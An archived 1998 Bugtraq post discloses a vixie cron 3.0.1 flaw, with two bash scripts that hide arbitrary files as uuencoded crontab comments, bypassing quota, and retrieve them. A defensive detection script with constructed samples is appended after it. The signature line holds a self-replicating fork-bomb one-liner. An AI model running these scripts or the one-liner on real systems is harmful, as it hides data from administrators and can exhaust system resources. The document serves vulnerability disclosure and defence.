[linux-security] vixie cron 3.0.1 continued


X-RDate: Mon, 09 Feb 1998 11:23:09 +0500 (ESK)
Date: Thu, 5 Feb 1998 17:16:18 +0100
From: Michał Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
To: BUGTRAQ@NETSPACE.ORG
Subject: [linux-security] vixie cron 3.0.1 continued

The problem with vixie cron is wider (and more funny) than I expected.
Here's my proggy which allows hiding files of any kind and size into
crontab entries (remember, quota is ignored ;-):

-- cron_put --
#!/bin/bash

echo "Vixie cron 3.0.1 file storage - put utility"
echo "by Michal Zalewski <lcamtuf@staszic.waw.pl>"
echo

if [ "$1" = "" ]; then
  echo usage: $0 file_to_hide
  echo
  exit 0
fi

if [ ! "`ulimit`" = "unlimited" ]; then
  echo Warning, filesize limit is set to `ulimit`.
  echo
fi

echo Installing fake crontab...
echo
echo "* * * * * # whoops..." >vix_tmp
uuencode "$1" <"$1" | awk -F "\n" '{print "#FAKE" $1}' >>vix_tmp
crontab vix_tmp
echo "Thank you, file stored successfully."
-- eof --

The next program allows further extraction of these files:

-- cron_get --
#!/bin/bash

echo "Vixie cron 3.0.1 file storage - get utility"
echo "by Michal Zalewski <lcamtuf@staszic.waw.pl>"
echo

if [ ! "`ulimit`" = "unlimited" ]; then
  echo Warning, filesize limit is set to `ulimit`.
  echo
fi

crontab -l | grep "#FAKE" | awk -F "#FAKE" '{print $2}'|uudecode
echo "File restored successfully."
-- eof --

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to execute recursively is divine      [P. Deutsch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
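
A defender-side check for the storage trick described in the message above, as an added example that is not part of the original post: it flags a crontab whose size, comment count, or embedded uuencode header suggests bulk data parked in comment lines. The function name, thresholds and sample crontabs are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original post: flag crontabs that carry bulk
# data in comment lines, the storage trick cron_put relies on.
# Thresholds are assumptions; tune them to what is normal on your hosts.
MAX_BYTES=${MAX_BYTES:-8192}
MAX_COMMENTS=${MAX_COMMENTS:-100}

# audit_crontab (hypothetical name): reads one crontab on stdin and prints
# "OK" or "SUSPECT <reasons>". The body is a subshell, so variables stay local.
audit_crontab() (
  data=$(cat)
  bytes=$(printf '%s\n' "$data" | wc -c | tr -d ' ')
  comments=$(printf '%s\n' "$data" | grep -c '^[[:space:]]*#' || true)
  # A uuencode header ("begin <mode> <name>") inside a comment line.
  uuhdr=$(printf '%s\n' "$data" |
    grep -c '^[[:space:]]*#.*begin [0-7][0-7][0-7] ' || true)
  reasons=""
  if [ "$bytes" -gt "$MAX_BYTES" ]; then reasons="$reasons size=$bytes"; fi
  if [ "$comments" -gt "$MAX_COMMENTS" ]; then
    reasons="$reasons comments=$comments"
  fi
  if [ "$uuhdr" -gt 0 ]; then reasons="$reasons uuencode-header"; fi
  if [ -n "$reasons" ]; then echo "SUSPECT$reasons"; else echo "OK"; fi
)

# Constructed sample in the layout cron_put produces: one dummy job, then
# "#FAKE"-prefixed uuencode lines. The payload is filler, not real data.
sample_stuffed() {
  echo '* * * * * # whoops...'
  echo '#FAKEbegin 644 constructed.bin'
  i=0
  while [ "$i" -lt 150 ]; do
    echo '#FAKEM000000000000000000000000000000000000000000000000000000000000'
    i=$((i + 1))
  done
  echo '#FAKEend'
}

# Constructed sample: an ordinary crontab with a couple of comments.
sample_normal() {
  echo '# rotate logs nightly'
  echo '15 3 * * * /usr/sbin/logrotate /etc/logrotate.conf'
  echo '# weekly backup begins Sunday'
  echo '0 4 * * 0 /usr/local/bin/backup.sh'
}

sample_stuffed | audit_crontab
sample_normal | audit_crontab
```

On a live host, run `audit_crontab < FILE` as root for each file in the cron spool directory (commonly /var/spool/cron or /var/spool/cron/crontabs, depending on the system).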
